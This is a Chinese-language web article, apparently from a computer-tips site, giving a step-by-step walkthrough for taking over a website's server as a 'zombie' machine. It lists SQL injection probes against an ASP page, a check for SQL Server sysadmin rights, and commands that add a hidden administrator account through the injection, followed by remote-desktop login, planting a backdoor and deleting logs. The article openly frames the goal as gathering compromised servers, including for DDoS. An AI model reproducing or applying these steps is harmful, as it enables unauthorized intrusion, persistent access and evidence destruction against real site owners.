热点推荐:
您现在的位置: 电脑学习网 >> 网络技术 >> 正文

按部就班 捕获肉鸡

2013-09-12 16:07:39  来源: 网络技术 

  即使捕获了菜鸟的肉鸡,质量也往往比较差,最多也可以做DDoS肉鸡。笔者建议,如果用来学习操作或者研究,还是捕获服务器肉鸡比较好,因为它稳定、24小时在线、速度快……优点数不胜数。下面笔者就带大家对一个站点进行测试。本文旨在抛砖引玉,希望与大家进行技术交流。
  1.例如http://xxx.cn/news.asp?newsid=1289为我们要测试的地方(为了不必要的麻烦,地址用xxx来代替)。检测注入漏洞是在网址后输入“AND 1=1”正常页面或“AND 1=2”不正常页面。发现漏洞的过程我想大家都知道,这里就不多说了。
  2.接着我们来判断数据库的类型。在地址后面输入:and (select count(*) from sysobjects)>0 也就是:http://xxx.cn/news.asp?newsid=1289 and (select count(*) from sysobjects)>0。
  3.从图1中可以看到页面正常返回!接着在地址上输入:and (select count(*) from msysobjects)>0。我们来看一下返回的情况,如图2所示。

  4.这样,我们可以判断,该数据库是SQL Server。下面,在地址后面输入这条命令:http://xxx.cn/news.asp?newsid=1289 and 1=(SELECT%20IS_SRVROLEMEMBER('sysadmin'))。wWw.itcOmpUTEr.cOM.cN
  5.这是判断读写权限,页面正常返回,如图3所示。晕,居然是SA权限。拿出NB 联盟注入工具来测试吧。操作比输入代码要简单,也比较易懂。

  6.在注入地址里填上要注入的地址,在下面的DOS 命令中输入“net user”查询账户(图4)。

  7.接着,输入“net user hsmw hsmw / add”添加 一个名字为 “hsmw”的账号(图5),再输入“net localgroup administrators hsmw /add”把刚刚添加的hsmw 这个账号(图6),提升为管理员权限。

   8.来看添加的效果。输入“net user”,我们可以看到,多了一个 hsmw的 账号。这说明添加账号成功了(图7)。

  9.再进行简单的扫描,看看开了3389端口没有。太“不幸”了,居然开了3389。哈哈,直接用我们刚刚添加的账号登录,然后留后门并删除日志。撤!

 


From:http://www.itcomputer.com.cn/Article/Network/201309/1066.html
  • 上一篇文章:

  • 下一篇文章:
  • 相关文章
      没有相关文章
    Copyright © 2005-2013 电脑知识网 Computer Knowledge   All rights reserved.